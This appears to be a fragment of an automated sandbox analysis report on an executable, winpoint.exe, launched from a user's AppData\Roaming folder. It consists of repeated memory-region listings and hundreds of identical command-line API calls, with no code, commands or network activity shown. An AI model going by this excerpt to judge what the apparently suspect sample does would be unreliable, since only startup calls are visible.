name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1896 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1897 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1898 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1899 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1900 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1901 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1902 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1903 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1904 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1905 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1906 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1907 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1908 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1909 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1910 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1911 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1912 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1913 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1914 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1915 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1916 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1917 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1918 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1919 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1920 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1921 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 
0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1922 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1923 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1924 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1929 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1930 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1931 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1932 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1933 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1934 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1935 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1936 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1937 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1938 start_va = 0x2f0000 end_va = 
0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1939 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1940 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1941 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1942 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1943 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1944 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1945 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1946 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1947 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1948 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1949 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1950 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1951 start_va = 
0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1952 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1953 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1954 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Thread: id = 60 os_tid = 0x650 [0161.635] __set_app_type (_Type=0x2) [0161.635] __p__fmode () returned 0x75c631f4 [0161.635] __p__commode () returned 0x75c631fc [0161.635] __wgetmainargs (in: _Argc=0x18ff28, _Argv=0x18ff18, _Env=0x18ff24, _DoWildCard=0, _StartInfo=0x18ff1c | out: _Argc=0x18ff28, _Argv=0x18ff18, _Env=0x18ff24) returned 0 [0161.638] GetStartupInfoW (in: lpStartupInfo=0x18ff2c | out: lpStartupInfo=0x18ff2c*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0161.638] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0161.638] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.638] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.638] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.638] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.638] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.638] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.638] 
GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.638] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.638] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.638] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.638] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.638] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.638] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.638] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.638] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.638] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.638] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.639] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.639] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.639] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.639] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.639] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.639] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.639] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.639] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.639] GetCommandLineA () 
returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.639] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.639] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.639] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.639] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.639] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.639] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.639] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.639] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.639] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.639] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.639] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.639] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.639] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.639] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.639] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.639] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.639] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.639] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.639] GetCommandLineW () 
returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.639] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.639] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.639] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.639] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.639] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.639] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.639] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.639] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.639] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.639] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.639] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.640] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.640] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.640] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.640] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.640] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.640] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.640] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.640] GetCommandLineA () 
returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.640] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.640] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.640] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.640] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.640] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.640] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.640] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.640] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.640] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.640] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.640] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.640] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.640] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.640] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.640] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.640] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.640] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.640] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.640] GetCommandLineW () 
returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.640] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.640] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.640] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.640] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.640] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.640] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.640] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.640] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.640] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.640] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.640] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.640] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.640] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.640] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.641] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.641] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.641] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.641] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.641] GetCommandLineA () 
returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.641] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.641] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.641] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.641] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.641] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.641] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.641] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.641] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.641] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.641] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.641] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.641] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.641] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.641] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.641] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.641] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.641] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.641] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.641] GetCommandLineW () 
returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.641] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.641] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.641] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.641] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.641] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.641] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.641] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.641] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.641] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.641] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.641] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.641] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.641] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.641] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.641] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.641] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.641] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.641] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.641] GetCommandLineA () 
returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.641] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.642] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.642] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.642] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.642] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.642] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.642] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.642] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.642] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.644] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.645] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.645] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.645] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.645] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.645] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.645] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.645] GetCommandLineW () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.645] GetCommandLineA () returned="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " [0161.645] GetCommandLineW () 
